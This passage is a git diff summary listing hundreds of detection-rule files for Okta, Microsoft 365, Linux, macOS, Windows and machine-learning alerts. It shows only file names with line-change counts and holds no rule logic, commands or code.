...ange_mailbox_audit_bypass_association.toml | 11 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 8 +- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...on_sharepoint_sharing_policy_weakened.toml | 14 +- ..._teams_custom_app_interaction_allowed.toml | 11 +- ...evasion_teams_external_access_enabled.toml | 11 +- ...very_sharepoint_sensitive_term_search.toml | 32 +- ...tion_exchange_transport_rule_creation.toml | 22 +- ..._exchange_transport_rule_modification.toml | 22 +- ...sent_grant_via_registered_application.toml | 42 ++- ...via_first_party_microsoft_application.toml | 34 ++- ..._identity_unusual_sso_errors_for_user.toml | 38 ++- ...ompliance_user_reported_phish_malware.toml | 15 +- ...ce_user_restricted_from_sending_email.toml | 10 +- ...al_movement_onedrive_malware_uploaded.toml | 21 +- ..._movement_sharepoint_malware_uploaded.toml | 21 +- ...a_id_global_administrator_role_assign.toml | 34 +-- ...e_exchange_management_role_assignment.toml | 30 +- ...picious_mailbox_permission_delegation.toml | 34 +-- ...nge_new_or_modified_federation_domain.toml | 43 +-- ...harepoint_site_collection_admin_added.toml | 20 +- ...l_access_attempted_bypass_of_okta_mfa.toml | 37 +-- ...mpts_to_brute_force_okta_user_account.toml | 8 +- ...vents_from_single_device_behind_proxy.toml | 18 +- ..._token_hashes_for_single_okta_session.toml | 29 +- ...multiple_user_agent_os_authentication.toml | 29 +- ...ccess_okta_aitm_session_cookie_replay.toml | 33 +- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- ...tial_access_user_impersonation_access.toml | 26 +- ...tempt_to_deactivate_okta_network_zone.toml | 10 +- ...n_attempt_to_delete_okta_network_zone.toml | 10 +- ..._app_client_credential_token_exchange.toml | 32 +- ...kta_attempt_to_deactivate_okta_policy.toml | 16 +- ...ttempt_to_deactivate_okta_policy_rule.toml | 10 +- ...on_okta_attempt_to_delete_okta_policy.toml | 20 +- ...ta_attempt_to_delete_okta_policy_rule.toml | 16 +- ...on_okta_attempt_to_modify_okta_policy.toml | 16 +- ...ta_attempt_to_modify_okta_policy_rule.toml | 16 +- ...ser_password_reset_or_unlock_attempts.toml | 37 ++- ...ttempt_to_deactivate_okta_application.toml | 27 +- ...ta_attempt_to_modify_okta_application.toml | 26 +- .../okta/impact_possible_okta_dos_attack.toml | 11 +- ...rrence_user_session_started_via_proxy.toml | 14 +- ...ta_user_attempted_unauthorized_access.toml | 29 +- ...ss_sign_in_events_via_third_party_idp.toml | 44 +-- ...cation_sso_from_unknown_client_device.toml | 35 +-- ...icious_activity_reported_by_okta_user.toml | 51 +++- ...ent_multiple_sessions_for_single_user.toml | 20 +- ...eatinsight_threat_suspected_promotion.toml | 32 +- ...tor_privileges_assigned_to_okta_group.toml | 31 +- ...inistrator_role_assigned_to_okta_user.toml | 33 +- ...ence_attempt_to_create_okta_api_token.toml | 14 +- ...mfa_deactivation_with_no_reactivation.toml | 29 +- ..._or_delete_application_sign_on_policy.toml | 21 +- ...login_to_okta_account_after_mfa_reset.toml | 38 +-- ...unt_privileged_process_events_by_user.toml | 11 +- ..._process_command_line_entropy_by_user.toml | 28 +- ...l_linux_rare_process_executed_by_user.toml | 11 +- ..._high_sum_concurrent_sessions_by_user.toml | 33 +- ...access_ml_okta_rare_host_name_by_user.toml | 8 +- ...cess_ml_okta_rare_region_name_by_user.toml | 8 +- ...access_ml_okta_rare_source_ip_by_user.toml | 22 +- ..._group_application_assignment_changes.toml | 30 +- ...okta_spike_in_group_lifecycle_changes.toml | 33 +- ...kta_spike_in_group_membership_changes.toml | 33 +- ...okta_spike_in_group_privilege_changes.toml | 30 +- ..._in_user_lifecycle_management_changes.toml | 27 +- ...ws_high_count_group_management_events.toml | 35 +-- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 13 +- ..._count_user_account_management_events.toml | 36 +-- ...ss_ml_windows_rare_group_name_by_user.toml | 44 +-- ...ndows_rare_privilege_assigned_to_user.toml | 8 +- ...s_ml_windows_rare_region_name_by_user.toml | 19 +- ...se_evasion_ml_rare_process_for_a_host.toml | 15 +- ..._ml_rare_process_for_a_parent_process.toml | 15 +- ...se_evasion_ml_rare_process_for_a_user.toml | 32 +- ...icious_windows_event_high_probability.toml | 20 +- ...picious_windows_event_low_probability.toml | 20 +- ...ous_windows_process_cluster_from_host.toml | 15 +- ...s_process_cluster_from_parent_process.toml | 15 +- ...ous_windows_process_cluster_from_user.toml | 15 +- ...and_control_aws_cli_endpoint_url_used.toml | 14 +- ...mand_and_control_cat_network_activity.toml | 30 +- ...and_control_cupsd_foomatic_rip_netcon.toml | 42 ++- ...and_control_curl_socks_proxy_detected.toml | 8 +- ..._git_repo_or_file_download_to_sus_dir.toml | 8 +- ...nd_and_control_ip_forwarding_activity.toml | 13 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ...mand_and_control_linux_kworker_netcon.toml | 43 ++- ...nd_control_linux_proxychains_activity.toml | 8 +- ..._and_control_linux_ssh_x11_forwarding.toml | 33 +- ...linux_suspicious_proxychains_activity.toml | 8 +- ...l_linux_tunneling_and_port_forwarding.toml | 7 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...mand_and_control_telegram_api_request.toml | 23 +- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ial_access_collection_sensitive_files.toml | 37 +-- ...ve_files_compression_inside_container.toml | 38 +-- ...ntial_access_gdb_init_process_hooking.toml | 7 +- ...credential_access_gdb_process_hooking.toml | 36 ++- .../credential_access_gh_auth_via_nodejs.toml | 32 +- ...ernetes_service_account_secret_access.toml | 40 ++- ...edential_access_manual_memory_dumping.toml | 7 +- ...tential_linux_ssh_bruteforce_external.toml | 7 +- ...tential_linux_ssh_bruteforce_internal.toml | 7 +- ...ss_potential_password_spraying_attack.toml | 7 +- ...ntial_successful_linux_ssh_bruteforce.toml | 7 +- ...ential_access_proc_credential_dumping.toml | 7 +- ..._or_passwords_search_inside_container.toml | 24 +- ...cess_ssh_password_grabbing_via_strace.toml | 31 +- ...nse_evasion_apparmor_policy_violation.toml | 7 +- ...ion_attempt_to_disable_auditd_service.toml | 8 +- ...tempt_to_disable_iptables_or_firewall.toml | 8 +- ...ion_attempt_to_disable_syslog_service.toml | 7 +- ...evasion_authorized_keys_file_deletion.toml | 28 +- ...ense_evasion_base64_decoding_activity.toml | 35 ++- ...binary_copied_to_suspicious_directory.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 7 +- ...ense_evasion_clear_kernel_ring_buffer.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 67 +++-- ...nse_evasion_directory_creation_in_bin.toml | 23 +- ...fense_evasion_disable_selinux_attempt.toml | 7 +- ...doas_configuration_creation_or_rename.toml | 31 +- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 52 +++- ...ion_hex_payload_execution_via_utility.toml | 22 +- ...nse_evasion_hidden_directory_creation.toml | 22 +- .../defense_evasion_hidden_file_dir_tmp.toml | 10 +- ...on_interactive_shell_from_system_user.toml | 32 +- ...rpreter_launched_from_decoded_payload.toml | 59 ++-- ...defense_evasion_journalctl_clear_logs.toml | 12 +- ...defense_evasion_kernel_module_removal.toml | 20 +- ...defense_evasion_kill_command_executed.toml | 45 ++- ...defense_evasion_kthreadd_masquerading.toml | 13 +- .../defense_evasion_ld_preload_cmdline.toml | 74 ++++- .../linux/defense_evasion_ld_so_creation.toml | 46 ++- ...evasion_multi_base64_decoding_attempt.toml | 61 +++- ...asion_potential_kubectl_impersonation.toml | 40 ++- ...vasion_potential_kubectl_masquerading.toml | 7 +- ...ense_evasion_potential_proot_exploits.toml | 33 +- ..._evasion_prctl_process_name_tampering.toml | 8 +- .../defense_evasion_rename_esxi_files.toml | 34 ++- ...ense_evasion_ssl_certificate_deletion.toml | 12 +- ...s_utility_executed_via_tmux_or_screen.toml | 8 +- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 32 +- ...vasion_sysctl_kernel_feature_activity.toml | 22 +- ...ense_evasion_unusual_preload_env_vars.toml | 31 +- ...efense_evasion_user_or_group_deletion.toml | 22 +- ...r_log_file_creation_by_unsual_process.toml | 47 ++- .../discovery_dynamic_linker_via_od.toml | 8 +- .../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 8 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 35 ++- .../discovery_kernel_module_enumeration.toml | 9 +- rules/linux/discovery_kernel_seeking.toml | 30 +- rules/linux/discovery_kernel_unpacking.toml | 30 +- .../discovery_kubeconfig_file_discovery.toml | 38 +-- ...iscovery_kubectl_permission_discovery.toml | 8 +- .../linux/discovery_linux_hping_activity.toml | 11 +- .../linux/discovery_linux_nping_activity.toml | 10 +- ..._mount_discovery_via_exports_or_fstab.toml | 8 +- .../discovery_pam_version_discovery.toml | 48 ++- .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 8 +- ...ivate_key_password_searching_activity.toml | 29 +- rules/linux/discovery_proc_maps_read.toml | 34 ++- .../linux/discovery_process_capabilities.toml | 8 +- ...curity_file_access_via_common_utility.toml | 37 +-- ...very_sudo_allowed_command_enumeration.toml | 11 +- .../discovery_suid_sguid_enumeration.toml | 38 ++- ...etwork_tool_launched_inside_container.toml | 50 ++- ...ry_suspicious_which_command_execution.toml | 11 +- ...overy_unusual_user_enumeration_via_id.toml | 23 +- ...covery_virtual_machine_fingerprinting.toml | 43 +-- .../discovery_yum_dnf_plugin_detection.toml | 13 +- ...tion_abnormal_process_id_file_created.toml | 31 +- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 40 ++- ...on_cupsd_foomatic_rip_shell_execution.toml | 14 +- ...omatic_rip_suspicious_child_execution.toml | 40 ++- ...nnection_from_entrypoint_in_container.toml | 38 ++- .../execution_executable_stack_execution.toml | 19 +- ...n_file_execution_followed_by_deletion.toml | 42 +-- ...executable_via_chmod_inside_container.toml | 25 +- ...er_or_listener_established_via_netcat.toml | 46 +-- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 37 ++- .../execution_nc_listener_via_rlwrap.toml | 31 +- ...ion_netcon_from_rwx_mem_region_binary.toml | 41 ++- ...cution_network_event_post_compilation.toml | 45 +-- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 99 +----- ..._overly_permissive_container_creation.toml | 25 +- ...rocess_backgrounded_by_unusual_parent.toml | 50 +-- ..._process_started_from_process_id_file.toml | 33 +- ...ss_started_in_shared_memory_directory.toml | 32 +- rules/linux/execution_python_tty_shell.toml | 7 +- .../execution_python_webserver_spawned.toml | 15 +- .../execution_shell_evasion_linux_binary.toml | 30 +- ...cution_shell_openssl_client_or_server.toml | 38 ++- ...xecution_shell_via_background_process.toml | 40 ++- ...ion_shell_via_child_tcp_utility_linux.toml | 37 ++- ...ecution_shell_via_java_revshell_linux.toml | 15 +- ...on_shell_via_lolbin_interpreter_linux.toml | 47 ++- ...execution_shell_via_meterpreter_linux.toml | 50 +-- ...execution_shell_via_suspicious_binary.toml | 37 ++- ...ution_shell_via_tcp_cli_utility_linux.toml | 37 ++- ...ution_shell_via_udp_cli_utility_linux.toml | 37 ++- ...traction_or_decrompression_via_funzip.toml | 37 ++- ...us_executable_running_system_commands.toml | 53 ++-- ...icious_mining_process_creation_events.toml | 45 ++- ...execution_suspicious_mkfifo_execution.toml | 37 ++- ..._container_creation_command_execution.toml | 32 +- ..._system_binary_file_permission_change.toml | 28 +- rules/linux/execution_tc_bpf_filter.toml | 34 ++- ...nknown_rwx_mem_region_binary_executed.toml | 14 +- .../execution_unusual_kthreadd_execution.toml | 48 ++- ...ual_path_invocation_from_command_line.toml | 38 ++- .../execution_unusual_pkexec_execution.toml | 40 ++- ...tion_potential_curl_data_exfiltration.toml | 23 +- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 20 +- ...tion_potential_wget_data_exfiltration.toml | 18 +- ...nusual_file_transfer_utility_launched.toml | 25 +- .../impact_memory_swap_modification.toml | 33 +- ...otential_bruteforce_malware_infection.toml | 56 +++- ..._first_time_public_key_authentication.toml | 34 +-- ...sful_ssh_authentication_by_unusual_ip.toml | 34 +-- ...ul_ssh_authentication_by_unusual_user.toml | 34 +-- ...ess_telnet_auth_bypass_via_user_envar.toml | 31 +- ...ral_movement_kubeconfig_file_activity.toml | 57 +++- ...lateral_movement_ssh_it_worm_download.toml | 42 ++- ...ment_telnet_network_activity_external.toml | 24 +- ...istence_apt_package_manager_execution.toml | 59 +++- ...nce_apt_package_manager_file_creation.toml | 30 +- ...ersistence_apt_package_manager_netcon.toml | 53 ++-- rules/linux/persistence_at_job_creation.toml | 20 +- rules/linux/persistence_boot_file_copy.toml | 53 +++- .../persistence_bpf_probe_write_user.toml | 28 +- .../persistence_bpf_program_or_map_load.toml | 35 ++- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 54 +++- .../linux/persistence_cron_job_creation.toml | 43 ++- .../persistence_dbus_service_creation.toml | 14 +- ...e_dbus_unsual_daemon_parent_execution.toml | 52 +++- ..._package_manager_plugin_file_creation.toml | 37 ++- ...kage_installation_from_unusual_parent.toml | 40 ++- .../persistence_dpkg_unusual_execution.toml | 39 ++- .../persistence_dracut_module_creation.toml | 51 +++- .../persistence_dynamic_linker_backup.toml | 31 +- ...ersistence_extract_initramfs_via_cpio.toml | 12 +- .../linux/persistence_git_hook_execution.toml | 44 ++- .../persistence_git_hook_file_creation.toml | 52 +++- rules/linux/persistence_git_hook_netcon.toml | 41 ++- ...ersistence_git_hook_process_execution.toml | 45 ++- ...rsistence_grub_configuration_creation.toml | 25 +- rules/linux/persistence_grub_makeconfig.toml | 12 +- .../persistence_init_d_file_creation.toml | 7 +- ...persistence_insmod_kernel_module_load.toml | 28 +- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 32 +- ...stence_kernel_driver_load_by_non_root.toml | 28 +- ...nel_module_load_from_unusual_location.toml | 28 +- ...rsistence_kernel_object_file_creation.toml | 30 +- ...ce_kubernetes_sensitive_file_activity.toml | 12 +- .../persistence_kworker_file_creation.toml | 38 ++- ...sistence_linux_backdoor_user_creation.toml | 39 +-- .../persistence_linux_group_creation.toml | 40 +-- ...e_linux_shell_activity_via_web_server.toml | 28 +- ..._linux_user_added_to_privileged_group.toml | 45 ++- ...tence_lkm_configuration_file_creation.toml | 25 +- .../persistence_manual_dracut_execution.toml | 33 +- ...rsistence_message_of_the_day_creation.toml | 7 +- ...sistence_message_of_the_day_execution.toml | 7 +- ...etwork_manager_dispatcher_persistence.toml | 52 +++- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 30 +- ...cation_module_creation_in_unusual_dir.toml | 30 +- ...ication_module_pam_exec_backdoor_exec.toml | 36 ++- ...authentication_module_source_download.toml | 39 ++- .../persistence_polkit_policy_creation.toml | 33 +- ...persistence_script_executable_bit_set.toml | 12 +- ...nce_process_capability_set_via_setcap.toml | 25 +- .../linux/persistence_pth_file_creation.toml | 44 ++- ...kage_installation_from_unusual_parent.toml | 32 +- ...sistence_setuid_setgid_capability_set.toml | 22 +- .../persistence_shared_object_creation.toml | 47 +-- ...simple_web_server_connection_accepted.toml | 71 +++-- ...ersistence_simple_web_server_creation.toml | 52 +++- ...site_and_user_customize_file_creation.toml | 44 ++- .../linux/persistence_ssh_key_generation.toml | 47 ++- rules/linux/persistence_ssh_netcon.toml | 38 ++- ...stence_ssh_via_backdoored_system_user.toml | 51 ++-- ...suspicious_file_opened_through_editor.toml | 68 +---- ...e_suspicious_ssh_execution_xzbackdoor.toml | 51 +++- ...ersistence_systemd_generator_creation.toml | 41 ++- rules/linux/persistence_systemd_netcon.toml | 65 ++-- .../persistence_systemd_service_started.toml | 37 ++- .../persistence_systemd_shell_execution.toml | 36 ++- ...ersistence_tainted_kernel_module_load.toml | 28 +- ...ainted_kernel_module_out_of_tree_load.toml | 24 +- .../linux/persistence_udev_rule_creation.toml | 12 +- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 38 ++- ...rsistence_unusual_exim4_child_process.toml | 38 +-- .../persistence_unusual_pam_grantor.toml | 41 ++- ...ersistence_unusual_sshd_child_process.toml | 52 +++- ...ser_or_group_creation_or_modification.toml | 12 +- ...sistence_web_server_sus_child_spawned.toml | 48 ++- ...ence_web_server_sus_command_execution.toml | 44 ++- ...tence_web_server_sus_destination_port.toml | 57 +++- ..._web_server_unusual_command_execution.toml | 48 ++- ..._package_manager_plugin_file_creation.toml | 35 ++- ...on_chown_chmod_unauthorized_file_read.toml | 47 ++- ...cve_2025_32463_nsswitch_file_creation.toml | 7 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 46 +-- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 12 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 52 +++- ...lege_escalation_kworker_uid_elevation.toml | 40 +-- ...lation_ld_preload_shared_object_modif.toml | 31 +- ...lation_linux_suspicious_symbolic_link.toml | 41 ++- ...n_load_and_unload_of_kernel_via_kexec.toml | 53 +++- ...vilege_escalation_pkexec_envar_hijack.toml | 26 +- ...ation_potential_bufferoverflow_attack.toml | 26 +- ...tion_potential_suid_sgid_exploitation.toml | 25 +- ...n_potential_suid_sgid_proxy_execution.toml | 39 ++- ...lation_potential_wildcard_shell_spawn.toml | 32 +- ...ge_escalation_sda_disk_mount_non_root.toml | 28 +- ...privilege_escalation_shadow_file_read.toml | 26 +- ...vilege_escalation_sudo_cve_2019_14287.toml | 13 +- .../privilege_escalation_sudo_hijacking.toml | 28 +- ...uspicious_cap_setuid_python_execution.toml | 7 +- ...ion_suspicious_chown_fowner_elevation.toml | 37 +-- ...calation_suspicious_passwd_file_write.toml | 37 +-- ...alation_suspicious_uid_guid_elevation.toml | 7 +- ...uid_elevation_from_unknown_executable.toml | 38 ++- ...lation_unshare_namespace_manipulation.toml | 8 +- ...ery_output_written_to_suspicious_file.toml | 54 ++-- ...e_file_access_followed_by_compression.toml | 48 +-- ..._control_aws_s3_connection_via_script.toml | 51 ++-- ..._control_executable_download_via_wget.toml | 36 ++- ...control_google_calendar_c2_via_script.toml | 59 +++- ...rol_network_connection_to_oast_domain.toml | 43 +-- ...trol_perl_outbound_network_connection.toml | 46 ++- ..._and_control_potential_etherhiding_c2.toml | 64 +++- ..._suspicious_curl_to_google_app_script.toml | 34 +-- ...ection_to_suspicious_top_level_domain.toml | 8 +- ..._connection_to_suspicious_web_service.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 27 +- .../credential_access_kerberosdump_kcc.toml | 16 +- ...s_keychain_pwd_retrieval_security_cmd.toml | 17 +- ...ential_access_mitm_localhost_webproxy.toml | 11 +- ...al_access_promt_for_pwd_via_osascript.toml | 32 +- ...ensitive_file_access_first_occurrence.toml | 25 +- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 19 +- ...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ...ion_gatekeeper_override_and_execution.toml | 36 ++- ..._evasion_modify_environment_launchctl.toml | 30 +- ...cy_controls_tcc_database_modification.toml | 44 ++- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 39 +-- .../defense_evasion_safari_config_change.toml | 16 +- ...dboxed_office_app_suspicious_zip_file.toml | 11 +- ...evasion_suspicious_tcc_access_granted.toml | 70 ++--- ..._evasion_unload_endpointsecurity_kext.toml | 24 +- .../discovery_full_disk_access_check.toml | 36 ++- .../macos/discovery_suspicious_sip_check.toml | 48 ++- ...ystem_and_network_configuration_check.toml | 23 +- ...covery_users_domain_built_in_commands.toml | 15 +- ...vasion_electron_app_childproc_node_js.toml | 30 +- ...l_access_suspicious_browser_childproc.toml | 13 +- ...staller_package_spawned_network_event.toml | 46 +-- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 32 +- ...n_shell_execution_via_apple_scripting.toml | 18 +- ...ution_unusual_library_load_via_python.toml | 23 +- ...uspicious_mac_ms_office_child_process.toml | 55 ++-- ...ential_access_kerberos_bifrostconsole.toml | 38 +-- ...ral_movement_remote_ssh_login_enabled.toml | 31 +- ...ment_suspicious_curl_to_jamf_endpoint.toml | 41 ++- ...teral_movement_vpn_connection_attempt.toml | 26 +- ...stence_account_creation_hide_at_logon.toml | 39 ++- ...sistence_apple_mail_rule_modification.toml | 31 +- ...ce_creation_change_launch_agents_file.toml | 13 +- ..._creation_hidden_login_item_osascript.toml | 47 ++- ..._access_authorization_plugin_creation.toml | 34 +-- ...ence_curl_execution_via_shell_profile.toml | 44 +-- ...launch_agent_deamon_logonitem_process.toml | 43 ++- ...e_docker_shortcuts_plist_modification.toml | 14 +- .../persistence_enable_root_account.toml | 36 +-- ...n_hidden_launch_agent_deamon_creation.toml | 38 +-- ...sistence_finder_sync_plugin_pluginkit.toml | 11 +- ...istence_folder_action_scripts_runtime.toml | 33 +- .../persistence_hidden_plist_filename.toml | 69 +++-- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 26 +- ...nce_manual_chromium_extension_loading.toml | 44 ++- ...ersistence_periodic_tasks_file_mdofiy.toml | 10 +- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ...rsistence_startup_item_plist_creation.toml | 53 ++-- ...tence_via_atom_init_file_modification.toml | 11 +- ...calation_applescript_with_admin_privs.toml | 34 +-- ...calation_explicit_creds_via_scripting.toml | 33 +- ..._escalation_local_user_added_to_admin.toml | 42 +-- ...ilege_escalation_root_crontab_filemod.toml | 30 +- ..._escalation_user_added_to_admin_group.toml | 42 +-- ...d_control_ml_packetbeat_dns_tunneling.toml | 15 +- ...d_and_control_ml_packetbeat_rare_urls.toml | 44 +-- ...control_ml_packetbeat_rare_user_agent.toml | 26 +- ..._access_ml_auth_spike_in_logon_events.toml | 8 +- ...pike_in_logon_events_from_a_source_ip.toml | 37 ++- ...execution_ml_windows_anomalous_script.toml | 35 +-- ...nitial_access_ml_auth_rare_user_logon.toml | 35 ++- ...windows_rare_user_type10_remote_login.toml | 31 +- .../ml_high_count_events_for_a_host_name.toml | 58 +++- rules/ml/ml_high_count_network_denies.toml | 66 ++-- rules/ml/ml_high_count_network_events.toml | 54 +++- .../ml_linux_anomalous_network_activity.toml | 60 +++- ...linux_anomalous_network_port_activity.toml | 44 ++- .../ml_low_count_events_for_a_host_name.toml | 27 +- .../ml/ml_packetbeat_rare_server_domain.toml | 58 +++- rules/ml/ml_rare_destination_country.toml | 60 +++- .../ml/ml_spike_in_traffic_to_a_country.toml | 48 +-- ...ml_windows_anomalous_network_activity.toml | 53 +++- ..._ml_linux_anomalous_process_all_hosts.toml | 20 +- ...istence_ml_rare_process_by_host_linux.toml | 30 +- ...tence_ml_rare_process_by_host_windows.toml | 20 +- ...ce_ml_windows_anomalous_path_activity.toml | 33 +- ...l_windows_anomalous_process_all_hosts.toml | 32 +- ...ml_windows_anomalous_process_creation.toml | 35 ++- ...tion_ml_linux_anomalous_sudo_activity.toml | 18 +- ...tion_ml_windows_rare_user_runas_event.toml | 18 +- ..._ml_linux_anomalous_compiler_activity.toml | 20 +- ...cepted_default_telnet_port_connection.toml | 42 ++- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 13 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 16 +- ...d_control_nat_traversal_port_activity.toml | 8 +- .../command_and_control_port_26_activity.toml | 30 +- ...te_desktop_protocol_from_the_internet.toml | 30 +- ...l_network_computing_from_the_internet.toml | 34 +-- ...ual_network_computing_to_the_internet.toml | 8 +- ...very_potential_network_sweep_detected.toml | 30 +- ...iscovery_potential_port_scan_detected.toml | 29 +- ...very_potential_syn_port_scan_detected.toml | 8 +- ...rtigate_sso_login_from_unusual_source.toml | 10 +- ...s_react_server_components_rce_attempt.toml | 28 +- ...ccess_react_server_rce_network_alerts.toml | 37 ++- ...mote_procedure_call_from_the_internet.toml | 11 +- ...remote_procedure_call_to_the_internet.toml | 30 +- ...file_sharing_activity_to_the_internet.toml | 18 +- ...al_access_unsecure_elasticsearch_node.toml | 19 +- ..._access_endgame_cred_dumping_detected.toml | 10 +- .../endgame_ransomware_detected.toml | 16 +- .../endgame_ransomware_prevented.toml | 16 +- .../execution_endgame_exploit_detected.toml | 28 +- .../execution_endgame_exploit_prevented.toml | 11 +- ...on_endgame_cred_manipulation_detected.toml | 18 +- ...n_endgame_cred_manipulation_prevented.toml | 18 +- ...ion_endgame_permission_theft_detected.toml | 28 +- ...on_endgame_permission_theft_prevented.toml | 28 +- ...on_endgame_process_injection_detected.toml | 18 +- ...n_endgame_process_injection_prevented.toml | 18 +- .../threat_intel_indicator_match_email.toml | 17 +- ...lection_email_outlook_mailbox_via_com.toml | 21 +- ...ion_email_powershell_exchange_mailbox.toml | 43 ++- .../collection_mailbox_export_winlog.toml | 13 +- .../collection_posh_audio_capture.toml | 24 +- .../collection_posh_clipboard_capture.toml | 22 +- rules/windows/collection_posh_keylogger.toml | 44 ++- rules/windows/collection_posh_mailbox.toml | 24 +- .../collection_posh_screen_grabber.toml | 22 +- .../collection_posh_webcam_video_capture.toml | 19 +- .../windows/collection_winrar_encryption.toml | 8 +- .../command_and_control_certreq_postdata.toml | 35 ++- ...ommand_and_control_common_webservices.toml | 45 ++- ...control_encrypted_channel_freesslcert.toml | 8 +- .../command_and_control_iexplore_via_com.toml | 45 +-- ...command_and_control_outlook_home_page.toml | 27 +- ...ontrol_port_forwarding_added_registry.toml | 41 ++- .../command_and_control_rdp_tunnel_plink.toml | 16 +- .../command_and_control_remcos_rat_iocs.toml | 35 +-- ...ol_remote_file_copy_desktopimgdownldr.toml | 31 +- ...d_control_remote_file_copy_powershell.toml | 12 +- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 31 +- ...control_sunburst_c2_activity_detected.toml | 24 +- ...d_control_teamviewer_remote_file_copy.toml | 8 +- ...nd_and_control_tool_transfer_via_curl.toml | 15 +- .../command_and_control_tunnel_yuze.toml | 8 +- ..._control_velociraptor_shell_execution.toml | 46 ++- .../credential_access_adidns_wildcard.toml | 27 +- ...ential_access_browsers_unusual_parent.toml | 33 +- ...ntial_access_bruteforce_admin_account.toml | 10 +- ...rce_multiple_logon_failure_same_srcip.toml | 10 +- .../credential_access_cmdline_dump_tool.toml | 39 ++- ...ial_access_dcsync_newterm_subjectuser.toml | 36 ++- ...tial_access_dcsync_replication_rights.toml | 36 ++- ...redential_access_dcsync_user_backdoor.toml | 42 +-- ...ntial_access_disable_kerberos_preauth.toml | 49 ++- .../credential_access_dnsnode_creation.toml | 27 +- ...redential_access_dollar_account_relay.toml | 13 +- ..._access_dollar_account_relay_kerberos.toml | 10 +- ...cess_domain_backup_dpapi_private_keys.toml | 12 +- .../credential_access_generic_localdumps.toml | 22 +- ..._access_iis_connectionstrings_dumping.toml | 14 +- .../credential_access_kerberos_coerce.toml | 16 +- ...credential_access_kerberos_coerce_dns.toml | 13 +- .../windows/credential_access_kirbi_file.toml | 8 +- .../credential_access_ldap_attributes.toml | 39 ++- ...edential_access_lsass_loaded_susp_dll.toml | 35 ++- ...edential_access_lsass_openprocess_api.toml | 30 +- ...tial_access_machine_account_smb_relay.toml | 10 +- ...l_access_mimikatz_memssp_default_logs.toml | 41 ++- ...ial_access_mimikatz_powershell_module.toml | 10 +- ..._access_mod_wdigest_security_provider.toml | 39 +-- ...l_access_moving_registry_hive_via_smb.toml | 37 ++- ...e_network_logon_provider_modification.toml | 20 +- ...edential_access_posh_invoke_ninjacopy.toml | 47 +-- ...edential_access_posh_kerb_ticket_dump.toml | 26 +- .../credential_access_posh_minidump.toml | 22 +- .../credential_access_posh_relay_tools.toml | 28 +- ...credential_access_posh_request_ticket.toml | 25 +- .../credential_access_posh_veeam_sql.toml | 26 +- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 44 ++- ...dential_access_remote_sam_secretsdump.toml | 29 +- ...ntial_access_saved_creds_vault_winlog.toml | 10 +- ...redential_access_saved_creds_vaultcmd.toml | 10 +- ...edelegationprivilege_assigned_to_user.toml | 38 ++- .../credential_access_shadow_credentials.toml | 39 ++- ...dential_access_spn_attribute_modified.toml | 33 +- ...ccess_suspicious_lsass_access_memdump.toml | 19 +- ...cious_winreg_access_via_sebackup_priv.toml | 36 ++- ..._symbolic_link_to_shadow_copy_created.toml | 41 ++- ...ial_access_veeam_backup_dll_imageload.toml | 25 +- .../credential_access_veeam_commands.toml | 41 ++- .../credential_access_wbadmin_ntds.toml | 22 +- ...dential_access_web_config_file_access.toml | 35 +-- ...dential_access_wireless_creds_dumping.toml | 36 ++- ...den_file_attribute_with_via_attribexe.toml | 38 ++- ...efense_evasion_amsi_bypass_powershell.toml | 24 +- ..._evasion_audit_policy_disabled_winlog.toml | 20 +- ...sion_clearing_windows_console_history.toml | 40 ++- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ..._signing_policy_modification_registry.toml | 10 +- ...ication_apps_suspicious_child_process.toml | 42 ++- 